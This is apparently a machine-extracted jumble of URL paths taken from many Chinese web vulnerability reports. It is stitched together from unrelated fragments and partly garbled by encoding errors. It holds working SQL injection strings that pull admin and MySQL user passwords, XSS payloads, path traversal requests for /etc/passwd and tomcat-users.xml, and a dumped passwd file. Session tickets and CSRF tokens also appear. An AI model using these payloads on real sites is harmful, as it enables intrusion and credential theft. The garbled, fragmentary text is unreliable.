/t.php%20style="height:530px /xinwen/chakanpinlun.php 
/d1images/pb/pbv4.html?http://sina.allyes.com/main/adfclick?db=sina&bid=348530,407971,413284&cid=0,0,0&sid=410714&advid=11979&camid=66222&show=ignore&url=${}swf${}http://d3.sina.com.cn/201202/10/391898_750450ls_bt_0213.swf /jsp/x-qyhsztc/gyztc-1.jsp?sub_num=54-1-1&num=54-1&id=30018%20and%201=1 /jsp/x-qyhsztc/gyztc-1.jsp?sub_num=54-1-1&num=54-1&id=30018%20and%201=2 /content_detail.php?content_id=199 /content_detail.php?content_id=199 Y:% /content_detail.php?content_id=199%20aNd%201=2%20unIon%20all%20selEct%20concat%280x3a,email,0x3a,city,0x3a,login_time,province,ad_login_num,reg_time%29,2,3,4,5,6%20from%20rmail.ad_admin65%20limit%20268994,1%23 /news /vm /schedule /creative /vm/idx.jsp /auth/login /freeform/admin/user/login.jsp /admin/login.php /admin/login.jsp /pub/admin/index.asp /manage /wp-login.php /wp-login.php /newproduct/overlaydemo/login.html /manager/login/ /manager/login/ /admin.php admin /blog/?query=%3Cscript%3Ealert%28%27valo%27%29%3C%2Fscript%3E&pg=blogSearch&nid=72&so=0&bid=psYGxgamZwY%3D&so=0&submit=%E6%90%9C / /index.aspx /admin/Default.html /administrator/ /Info/default.aspx /index.aspx / /Online_PC/Uscript2.aspx?sid=146747 /login / /uwap-manager/layout/main.jsp / /showresumeinfo/?rid=26680744950240 /outsendresume/?id=26680744950240 /include/common/province_city.php?pid=10 /include/common/province_city.php?pid=10%20and%200%3C%3E(select%20count(*)%20from%20admin)可返回查询结果 / /index/newslist.php?category_id=2的注入漏洞和搜索引擎上发现的错误信息得知web路径,load_file读配置文件得到mysql用户及密码 /website.rar /data.rar /plus/add_rec.php?action=login&url={$adminHttpPath /users/userinfo.php?username=qiaofeiyu /users/userinfo.php?username=qiaofeiyu /users/userinfo.php?username=qiaofeiyu /skin/view.php?id=-111 
/blog/blog_detail_infoshare.jsp?owernuin=1195202988&channel=0&back=false&dl=&backCount=0&feedcenter_pn=1&share_fs=0&sid=AVykuoOe4hjVcn0MY01gR4-N&ownerid=1329308187&count=20&B_UID=512523656&offset=0&opuin=454656134&share_uin=454656134&share_type=30&share_id=1329404884&bId=1329308187&type=all&ic=true /jxt/xxt/sjhdxx.jsp?id=2 /dtt/dtt_upload.php /test.php /cms/demo.php?pid=3075&from=874 /x/c/?RYtLCsIwEED3gnfwAs1njJAKg6AbFy68QZHp0EgzibSRHD925_LBg8cjtNAEbe99W9A6Y6BFBOd8CxhK_Zy1rrWqxJWnSVEWRUk.lzx_qei_724bBk4qFLmQDCKELNQN3Ro4xjVkmnkBY8GA9a.9biv3LHw1sNn.byM_3mk_HN0PA81 /city_detail.php?id=96 /mj10/jd/snews.asp?id=139 /market/kanwu/display2.asp?id=163 /viewnews.asp?id=260 /cs/2011pxsyc/home2-1-dt.asp?id=28 /Album/other/sfgundong_hz_china.aspx?url=p /gwy2010/index.php?p=1&sid=&fromid=&a=%E5%AE%81%E6%B3%A2%E5%87%BA%E5%85%A5%E5%A2%83%E6%A3%80%E9%AA%8C%E6%A3%80%E7%96%AB%E5%B1%80&action=column&type=3&wv=2 /comments.php?au=395389&wv=2&v=s&iv=zh&fromid=&p=4&un=5Y2X5p6B5LuZ57%20B&bid=19535 /comments.php?au=395389&wv=2&v=s&iv=zh&fromid=&p=1&un=5Y2X5p6B5LuZ57%20B&bid=19281 /vnet_news_vote.php?vt=c&sid=&chid=1_14_3&cnid=1249241&p=1&wv=2&coid=1_14_3_1&v=&fromid=765 /newsView.php?f=f&wv=2&sid=&chid=1_11&coid=1_11_9&cnid=1265128&fromid=765&p=1 /newsView.php?fromid=765&p=1&f=f&wv=2&sid=&chid=1_8&coid=1_8_12&cnid=1265977 /zone/luchuan/ajax/specialservice.php?app=survey&id=1&userid=58084511&jsoncallback= /cards/senddrawshow.do?cardId= /medal/getmedaljsonp.do?sid=ZAujqBPBgXfmMXGbTPBBmaskmPZMgALt&uid=rehat@163.com&from=webmail&p=0&callback= /medal/task/signinframe.do?from= /medal/getmedaljsonp.do?sid=ZAujqBPBgXfmMXGbTPBBmaskmPZMgALt&uid=rehat@163.com&from=webmail&p=0&callback=%2B%2Fv9%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg- /index.php?goto= /1.php /thread-2635628-1-1.html 
/index.php?appid=2&goto=http://bbs.xiaomi.com/thread-2635628-1-1.html登录,就会自动跳转到http://bbs.xiaomi.com/thread-2635628-1-1.html&token=...这个帖子,如果用户点击链接就会跳转到http://127.0.0.1/1.php,那么我就可以用1.php对用户的来源进行追踪。 1.php*/ /thread-2635628-1-1.html&token= /img.php#1.php /index.php?appid=2&goto=http://bbs.xiaomi.com/thread-2635628-1-1.html登录,那么浏览器就会自动加载图片,我们就可以用img.php对用户进行追踪,并且不用用户点击链接就可以直接获取用户的TOKEN,这个就比方法1严重得多了 img.php*/ image/png /re?url=...那么我们就可以用http://passport.xiaomi.com/index.php?appid=2&goto=http://www.xiaomi.com/re?url=...进行二次跳转,TOKEN依然可以追踪,并且可以钓鱼 /上存在nginx解析漏洞,nginx未打补丁 www.xiaomi.com/“吗??? /birt/frameset?__report=test.rptdesign'&sample=my+parameter birt.war/test.rptdesign /brand/key.php?key=%E9%9D%A2%E8%86%9C&b=918 /member/index_do.php?fmdo=user&dopost=regnew alert /DownloadFile?type=full&file=/../../../../../../../../../etc/passwd /ActivityCalendar.rar /5107/upload/uploadFlash.php /show/12969.html /5107/upload/uploadFlash.php /spbbs/images/ /spbbs/admin/ /register/register.htm?oauth_token=ReqTk1024429798630682&oauth_callback=http://mail.aliyun.com/uniquelogin.htm /portal/web/GetMesPwdIndexAction.do /aaa.php /test1.php /phpinfo.php三个页面内容一样 /pic/?a=cate&id=23 /fckeditor/editor/filemanager/connectors/test.html /img/baidu_logo.gif /xss.js /Reports。当然一般管理机都在内网,这个可在内网渗透的时候做一点参考使用。 /thread-100507-1-1.html一文二楼评论中代码指向http://ll.ninth.biz/tc.swf /av.htm /index.jsp%20 /common/ /jsp/ http://www.acc.gov.cn/filemanager/upfile/image/2011120511025542.jsp /#q=inurl:*backupdata*dede_admin&hl=zh-CN&newwindow=1&safe=strict&prmd=imvns&ei=U_dCT7WpOIe9iAe1qpDlBA&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=1fcd94471d9bb062&biw=1280&bih=659 /ucHome/space.php?uid=150 /ucHome/space.php?uid=318 /kx/clientveiw.jsp?id=1 /LTGeneral/tvgame/85011paiweb116/welcome.php /然后很顺利的看到了新浪的短信后台什么的,在点点,发现了数据库的dump文件, /zhuanti/daonian.rar /news/jiangmin/todayinfo.rar /images.zip /zhuanti/kv2008.rar /BuyProducts.rar /forum/list.php?type=search&ktype=3&word=%B6%DF%C0%B2A%C3%CE 
/1253200/Perclerk/sendsmscode.asp?telno=手机号 /addNotify.action?id=";}}alert("xss") /all/38 /shiyong/goodsdetail.php?id=80 /portal/zh_CN/upload/File/PSBC-Mobile/login/login.html /admin/ /Flash/stat_hits.php?itemid=6717 /sdodownload/passport/SNDAHomepage.rar /kf.rar /news/ns.rar /userweb.rar //Pay/CashPromotion.rar /login-queue/rest/queue/cancelQueue/10000%3cbody%20onload=javascript:alert(%22test-it,can-be-write-anyone-xss-lol~%22)%3e /data/asia_cups/player.php?id=15 /detail.php?id=15 /admin/login.php sohu.com club /jimmy.php /jimmy.php /jimmy.php /jimmy.php /jimmy.php /phpinfo.php /.svn/entries /updatesmall.php /awstats/awstats.pl?config=3g.mop.com&year=2012&month=2&day=25 /gzlr/Article/ShowArticle.asp?title=单位简介 /info_view.asp?id=18 /WEB/myekt.aspx /WEB/searchnews.aspx?cid=46 /WEB/newsdetail.aspx?nid=222 /WEB/businessinde.aspx?sid=16 /WEB/login.aspx)泄露。 /kns55/index.aspx /backend.php/interface/print/user_id/186863/talentTypeId/20 /backend.php/interface/export/user_id/186864/talentTypeId/20 /!tagjoblist/_job_tag_id/1/job_id/10330%20and%20exists%28select%20*%20from%20mysql.user%29%23/ /extmail/cgi/env.cgi /simp/news.php?news_id=39 /admin/index.php /wiki/index.php /cms/common/filechooseold/browser.jsp?webapppath=../htdocs/web/&uploadpath=/ /cms/common/filechooseold/browser.jsp?webapppath=../htdocs/web/&uploadpath=/ / /readimagexs.aspx?xh=88888888的形式读取 /cjz/news_view.php?id=190 /cjz/news_list.php?type=zhuanzhe /cjz/news_list.php?type=zhuanzhe /config/ /sitemap_index.xml /report.php?rid=-6574+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat_ws /video.php?id=-8864+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,concat_ws /photo.php?album_id=-2620+UNION+ALL+SELECT+concat_ws x:0:0:root:/root:/sbin/nologin x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt 
x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:65534:65534:Anonymous /var/lib/nfs:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:501:48::/home/wangwanyou:/bin/bash /login/ /login/xcl0ud /userinfo.php /cgi-bin/cgi_rss_out?uin=54450919 /Ezine.php?id=1 /Ezine.php?id=1 /report/news/info.jsp?id=61 /report/login.jsp /search.php?goods_id=122079535[SQLi /article.php?article_id=220[SQLi /goods_kinds.php?act=list&cat_id=50020211[SQLi /help.php?act=search_article&article_id=91[SQLi /buy_now.php?act=StartOrder&store_id=[SQLi /goods_show.php?sku_id=13467&apple_id=[SQLi /search.php?act=list&key=[SQLi /groupbuy.php?act=index&shop_id=1000[SQLi /help.php?act=search_article&article_id=91[SQLi /article.php?article_id=220[SQLi /ml/index.php?id=013 /cw.do?actions=infoList&channel=3&columns=2 /user/login /20100725/admin/Login.asp?act=Login /ad_alt_js.php?zoneid=678 /ad_multibyid.php?zoneid=1 /ad_alt_click.php?z=227&b=230%5C /ad_alt_js.php?zoneid=1 /tips/goodbaby/serials/default.php?topic_id=5&chapter_id=14&article_id=6817 /consumable/_c/consumable_list.php?ID=3[SQLi /consumable/_c/products_list.php?ID=1[SQLi /consumable/_c/products_item.php?ID=15[SQLi 
/consumable/_c/consumable_detail.php?ID=3[SQLi /school_show.php?college_id=96+/*!and*/+1=2+/*!uNioN*/+/*!seLecT*/+1,user_name,3,4,user_pwd,6,7,8,9,10,11,12,13,14+/*!from*/+admin /content.php?id=1253+/*!aND*/1=2+/*!uNion*/+/*!select*/+1,2,3,4,5,6,SCHEMA_NAME,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+/*!from*/+information_schema.schemata+limit /school/schindex.php?id=4328+/*!aND*/1=2+/*!uNion*/+/*!select*/+1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14,15,16,17+/*!from*/+information_schema.TABLES+/*!where*/+TABLE_SCHEMA=0x7A6478786A68+limit /contact.php?provinceid=2 /contact.php?provinceid=2 /templates/ /images/ /data/ /include/等等各种遍历。 /chat/index.php?id=22 /info/search.php?catid=831&search=1&keywords=88952634 /userteam.php?team_no=NTe008就存在sql注入漏洞 0:number 0:age 0:evicted 0:evicted_nonzero 0:evicted_time 0:outofmemory 0:tailrepairs 0:reclaimed 1:number 1:age 1:evicted 1:evicted_nonzero 1:evicted_time 1:outofmemory 1:tailrepairs 1:reclaimed /reg/?src=wan&t=wan&v=1&tpl= /admin/login.jsp php:111 /index.php?controller=user&action=login /index.php /index.php /static/images/android.gif/x.php /phpfolder/src/in/report/logview/logview.php?filename=4477270_20111109_20111110140150.html&path=miliao /account/del /active/telrate/login /activity/mcdonalds / /user/chgpass/username/{target /2012ct4s/index.php?ca=B /mingr.php /gongh.php /meir.php /fuh.php /plp.php /aqrj.php /votelog.php?classify=2 /admin/editubb/eWebEditor.asp?id=2 /StdSP_OP_LOG/2011-09-30-StdSP_OP_LogInfo.log /SMPSaaSPay1_log/2012-03-04-PortalPay_LogInfo.log /baby.tar.gz /robots.txt%00.php /wow/tw/itemsets.html?su=46 /wow/cn/items.html?minle=85 /ucbrowser/images/logo.png/guest.php /ucbrowser/images/logo.png/guest.php /team/index.php?filter=true&keyword=qqqq返回空 /team/index.php?filter=true&keyword=qqqq'+or%20'1'='依然返回空 /team/index.php?filter=true&keyword=qqqq'+or%20'%'='返回数据 /team/index.php?filter=true&keyword=qqqq'+or%200%3E0+or%20'1'='返回空 
/team/index.php?filter=true&keyword=qqqq'+or%201%3E0+or%20'1'='返回数据 /team/index.php?filter=true&keyword=qqqq'+or%20(select%201)%3E0+or%20'1'= appkey=2043051649 /share/share.php?c=spr_web_bd_tudou_weibo&url=http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FL5PVW-u0ewE%2F%3FresourceId%3D0_03_05_02&title=%E3%80%8A%E6%AF%81%E5%AE%B9%E5%B0%91%E5%A5%B3%E8%BF%9B%E4%BA%AC%E6%B2%BB%E7%96%97%E3%80%8B+%EF%BC%88%E5%8F%AF%E9%80%89%E5%8E%9F%E7%94%BB%E6%B8%85%E6%99%B0%E5%BA%A6%EF%BC%89&source=%E5%9C%9F%E8%B1%86%E7%BD%91&sourceUrl=http%3A%2F%2Fwww.tudou.com%2F&content=gb2312&pic=http%3A%2F%2Fi2.tdimg.com%2F122%2F452%2F239%2Fp.jpg&appkey=2043051649&ralateUid=1692113870 /1829851507/y8DfIdTWT /12530/登陆的时候选取动态密码。然后就可以无限点了! /info/index.php http://www.greenet.cn/ http://zj.greenet.cn/ /tool.aspx(可能是程序员来用于调试的吧!) info_cont.asp /user/classroom/.svn/entries /download.jsp?filename=../WEB- /download.jsp?filename=../../../conf/tomcat-users.xml /download.jsp?filename=../index.jsp /download.jsp?filename=../WEB-INF/classes/db/Dbhelper.class /projector/cgfa/index.php?categoryId=1%29%20%20as%20c%20on%20c.articleId=a.id%20where%20%28select%20@@version%29=1-- /oa/news/?categoryId=1xx /active.php?ac=5%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20concat%280x7c,user,0x7c,password,0x7c,host%29%29%20from%20mysql.user%20limit%206,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /admin/tpl/action.htm /admin/tpl/ /pages/default.asp /poem/index.php?_c=poet&_a=list&country=foreign&era=%E6%B3%95%E5%9B%BD /oa/pandian/index.php /solution/solutionList.php /fangan/index.php /list/product/index.php /writinglive/more.php /xzx/more_gz.php /v2/api/?getapi&class= /v2/api/?getapi&class=login&tpl= /jishigou30s/index.php?mod=settings&code=face /posts/2012/03/05/github-hacked-rails-security/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed /news.jsp?id=301 /news.jsp?id=302 /interview/view.php?tid=13 
/interview/view.php?tid=13 /%80../%80../%80../%80../%80../%80../windows/win.ini /auth.do?id= /bbs/user/whatsnew?ct= /bbs/topic/21232194?ct= /bbs/topic/22217955?ct= /bbs/topic/22371419?ct= /bbs/topic/22365183?ct= /bbs/topic/22351725?ct= /bbs/topic/22351098?ct= /bbs/topic/22372447?ct= /bbs/topic/22340224?ct= /bbs/topic/22332057?ct= /bbs/topic/22357296?ct= /bbs/topic/22184933?ct= /bbs/topic/22315564?ticket= /bbs/topic/22315564?ticket=ST-2389757-cLdwoXqKigjuzG3ziYrsWmsFQ0xxRCQThP0-20&ct= /bbs/topic/22344120?ct= /bbs/topic/22310253?ct= /bbs/topic/22311341?ct= /bbs/topic/22337453?ct= /bbs/topic/22142517?ct= /bbs/topic/22226481?ct= /bbs/topic/22330911?ct= /bbs/topic/22316397?ct= /bbs/topic/22259808?ct= /bbs/topic/22339359?ct= /bbs/topic/22337456?ct= /bbs/topic/21821850?ct= /bbs/topic/22355880?ct= /bbs/topic/22275492?ct= /bbs/topic/22162468?ct= /bbs/topic/22264490?ct= /bbs/topic/22097159?ct= /bbs/topic/22246286?ct= /bbs/topic/22348669?ct= /bbs/post/page?bid=87&sty= /bbs/thread/22215237?ct= /bbs/thread/22189111?ct= /bbs/thread/22189637?ct= /bbs/topic/22316902?ct= /bbs/post/page?bid=87&sty=1&age= /bbs/post/page?bid=87&sty=1&age=30&ct= /bbs/post/page?bid=47&sty= /bbs/thread/21648961?ct= /bbs/thread/21605883?ct= /bbs/thread/21608785?ct= /bbs/post/page?bid=47&sty=1&age= /bbs/post/page?bid=47&sty=1&age=30&ct= /bbs/post/page?bid=50&sty= /bbs/post/page?bid=50&sty=1&age= /bbs/post/page?bid=50&sty=1&age=30&ct= /bbs/thread/22349098?ct= /bbs/thread/22346276?ct= /bbs/post/page?bid=45&sty= /bbs/thread/22317013?ct= /bbs/thread/22322726?ct= /bbs/thread/22337310?ct= /bbs/thread/22339991?ct= /bbs/post/page?bid=45&sty=1&age= /bbs/post/page?bid=45&sty=1&age=30&ct= /bbs/thread/22234903?ct= /bbs/thread/22237921?ct= /bbs/thread/22240160?ct= /bbs/thread/22283616?ct= /bbs/thread/22217096?ct= /bbs/thread/22289069?ct= /bbs/thread/22283473?ct= /bbs/post/page?bid=10&sty= /bbs/thread/22054244?ct= /bbs/thread/22123968?ct= /bbs/thread/22247435?ct= /bbs/thread/22239982?ct= /bbs/thread/22088116?ct= 
/bbs/thread/22272143?ct= /bbs/post/page?bid=92&tpg= /bbs/post/page?bid=10&sty=1&age= /bbs/post/page?bid=92&tpg=3&s= /bbs/post/page?bid=10&sty=1&age=30&ct= /bbs/post/page?bid=92&tpg=3&s=0&age= /bbs/thread/22134495?ct= /bbs/thread/22217739?ct= /bbs/thread/22067131?ct= /bbs/post/page?bid=92&tpg=3&s=0&age=0&order= /bbs/post/page?bid=92&tpg=3&s=0&age=0&order=0&ct= /bbs/post/page?bid=46&sty= /bbs/post/page?bid=46&sty=1&age= /bbs/post/page?bid=46&sty=1&age=30&ct= /detail/2468703?username= /detail/2468703?username=wangminchao&bid= /detail/2468703?username=wangminchao&bid=46&subject= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken=9bebcaa8-f330-4199-a9a4-ec5d42143de3&action= /bbs/thread/22250738?ct= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken=9bebcaa8-f330-4199-a9a4-ec5d42143de3&action=Delete&fileId= /bbs/thread/22220243?ct= /bbs/thread/22223120?ct= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken=9bebcaa8-f330-4199-a9a4-ec5d42143de3&action=Delete&fileId=0&limit= /bbs/post/page?bid=146&sty= /bbs/thread/22170049?ct= /bbs/thread/22108915?ct= /bbs/thread/22177339?ct= /bbs/post/page?bid=146&sty=1&age= /bbs/post/page?bid=146&sty=1&age=30&ct= /bbs/thread/22080946?ct= /bbs/thread/22080560?ct= /bbs/thread/22302472?ct= /bbs/thread/22080786?ct= /bbs/thread/22096910?ct= /bbs/thread/22332340?ct= /bbs/thread/22315278?ct= /bbs/post/page?bid=15&sty= /bbs/post/page?bid=15&sty=1&age= /bbs/post/page?bid=15&sty=1&age=30&ct= /bbs/?ct= /bbs/thread/22352614?ct= /bbs/thread/22355470?ct= /bbs/post/page?bid=114&sty= /bbs/thread/22325695?ct= /bbs/thread/22325271?ct= /bbs/thread/22330620?ct= /bbs/thread/22197931?ct= /bbs/thread/22361535?ct= /bbs/thread/22318746?ct= /bbs/thread/22330481?ct= /bbs/thread/21973722?ct= /bbs/post/page?bid=114&sty=1&age= /bbs/post/page?bid=114&sty=1&age=0&ct= 
/bbs/topic/18756019?done= /bbs/topic/18756019?done=/bbs/topic/18756019&ct= /bbs/topic/22104390?done= /bbs/topic/22108917?done= /bbs/topic/22197088?done= /bbs/topic/22138533?done= /bbs/topic/22104390?done=/bbs/topic/22104390&ct= /bbs/topic/22108917?done=/bbs/topic/22108917&ct= /bbs/topic/22097072?done= /bbs/topic/22197088?done=/bbs/topic/22197088&ct= /bbs/topic/22130397?done= /bbs/topic/22105488?done= /bbs/topic/22086394?done= /bbs/topic/22097072?done=/bbs/topic/22097072&ct= /bbs/topic/22118384?done= /bbs/topic/22138533?done=/bbs/topic/22138533&ct= /bbs/topic/22111245?done= /bbs/topic/22130397?done=/bbs/topic/22130397&ct= /bbs/topic/22086394?done=/bbs/topic/22086394&ct= /bbs/topic/22105488?done=/bbs/topic/22105488&ct= /bbs/topic/22118384?done=/bbs/topic/22118384&ct= /bbs/topic/22111245?done=/bbs/topic/22111245&ct= /search?done= /search?done=/bbs/file/search&ct= /limitedTime?done= /ranking?done= /detail/4009168?username= /detail/2467959?username= /detail/2475896?username= /detail/4007323?username= /uploads?done= /detail/2463701?username= /ranking?done=/bbs/file/ranking&ct= /limitedTime?done=/bbs/file/limitedTime&ct= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid= /detail/2467959?username=binpda&bid= /detail/4007323?username=hotstone&bid= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject= /detail/4042029?username= /uploads?done=/bbs/file/uploads&ct= /detail/2463701?username=guodanni&bid= /detail/4042022?username= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject= /detail/4042032?username= /detail/2467959?username=binpda&bid=80&subject= /detail/4007323?username=hotstone&bid=50&subject= /detail/4042029?username=liudehua1234024&bid= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken= /detail/2463701?username=guodanni&bid=80&subject= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject=浜氬お鍦板尯闈為潤鑴夋洸寮犳€т笂娑堝寲閬撳嚭琛€涓撳鍏辫瘑鎰忚瑙h锛堜竴銆佷簩锛�&csrfToken=f5752d2b-44e9-4527-b5c2-3bf1d5ca5281&action= /detail/4042032?username=zhn926&bid= 
/detail/4042022?username=wanggxy28&bid= /detail/4042029?username=liudehua1234024&bid=131&subject= /detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken= /detail/4042020?username= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken=62f3a31c-8636-42c4-86dc-c74653b0377d&action= /detail/2463701?username=guodanni&bid=80&subject=鍥藉鑷劧鍩洪噾鐢宠涔﹀啓浣滆娉ㄦ剰鐨勫嚑涓棶棰�&csrfToken=78393a5a-9976-49f9-b4b9-2276ee247c92&action= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject=浜氬お鍦板尯闈為潤鑴夋洸寮犳€т笂娑堝寲閬撳嚭琛€涓撳鍏辫瘑鎰忚瑙h锛堜竴銆佷簩锛�&csrfToken=f5752d2b-44e9-4527-b5c2-3bf1d5ca5281&action=Delete&fileId= /detail/4042032?username=zhn926&bid=137&subject= /detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken=593117b1-1c69-4653-a099-42f29892ae32&action= /detail/4042022?username=wanggxy28&bid=137&subject= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken=62f3a31c-8636-42c4-86dc-c74653b0377d&action=Delete&fileId= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject=浜氬お鍦板尯闈為潤鑴夋洸寮犳€т笂娑堝寲閬撳嚭琛€涓撳鍏辫瘑鎰忚瑙h锛堜竴銆佷簩锛�&csrfToken=f5752d2b-44e9-4527-b5c2-3bf1d5ca5281&action=Delete&fileId=0&limit= /detail/2463701?username=guodanni&bid=80&subject=鍥藉鑷劧鍩洪噾鐢宠涔﹀啓浣滆娉ㄦ剰鐨勫嚑涓棶棰�&csrfToken=78393a5a-9976-49f9-b4b9-2276ee247c92&action=Delete&fileId= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken=593117b1-1c69-4653-a099-42f29892ae32&action=Delete&fileId= /detail/4042020?username=jiaqing5604128&bid= /detail/4042032?username=zhn926&bid=137&subject=鏂扮敓鍎挎憾琛€鐥�&csrfToken=ec716f6d-3b36-4dd4-9cf4-11b1d340024b&action= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken=62f3a31c-8636-42c4-86dc-c74653b0377d&action=Delete&fileId=0&limit= 
/detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken=986d0446-853a-4215-8d75-494e3825960b&action= /detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken=b27fa8dd-a778-44c9-8797-e5a6e431404c&action= /detail/4042022?username=wanggxy28&bid=137&subject=鎴戝浗鍎跨鎬ユ晳浣撶郴寤鸿鐜扮姸涓庡彂灞曟€濊€�&csrfToken=aae693cf-2b28-4fea-990d-dc1b4019894e&action= /detail/2463701?username=guodanni&bid=80&subject=鍥藉鑷劧鍩洪噾鐢宠涔﹀啓浣滆娉ㄦ剰鐨勫嚑涓棶棰�&csrfToken=78393a5a-9976-49f9-b4b9-2276ee247c92&action=Delete&fileId=0&limit= /detail/4042032?username=zhn926&bid=137&subject=鏂扮敓鍎挎憾琛€鐥�&csrfToken=ec716f6d-3b36-4dd4-9cf4-11b1d340024b&action=Delete&fileId= /detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken=986d0446-853a-4215-8d75-494e3825960b&action=Delete&fileId= /detail/4042020?username=jiaqing5604128&bid=46&subject= /detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken=b27fa8dd-a778-44c9-8797-e5a6e431404c&action=Delete&fileId= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken=593117b1-1c69-4653-a099-42f29892ae32&action=Delete&fileId=0&limit= /detail/4042022?username=wanggxy28&bid=137&subject=鎴戝浗鍎跨鎬ユ晳浣撶郴寤鸿鐜扮姸涓庡彂灞曟€濊€�&csrfToken=aae693cf-2b28-4fea-990d-dc1b4019894e&action=Delete&fileId= /detail/4042032?username=zhn926&bid=137&subject=鏂扮敓鍎挎憾琛€鐥�&csrfToken=ec716f6d-3b36-4dd4-9cf4-11b1d340024b&action=Delete&fileId=0&limit= /detail/4042020?username=jiaqing5604128&bid=46&subject=鏉ュ緱鏃�&csrfToken=bec9291b-18a4-4e70-aa2d-520d8d1466e9&action= /detail/4042022?username=wanggxy28&bid=137&subject=鎴戝浗鍎跨鎬ユ晳浣撶郴寤鸿鐜扮姸涓庡彂灞曟€濊€�&csrfToken=aae693cf-2b28-4fea-990d-dc1b4019894e&action=Delete&fileId=0&limit= /detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken=986d0446-853a-4215-8d75-494e3825960b&action=Delete&fileId=0&limit= /detail/4042020?username=jiaqing5604128&bid=46&subject=鏉ュ緱鏃�&csrfToken=bec9291b-18a4-4e70-aa2d-520d8d1466e9&action=Delete&fileId= 
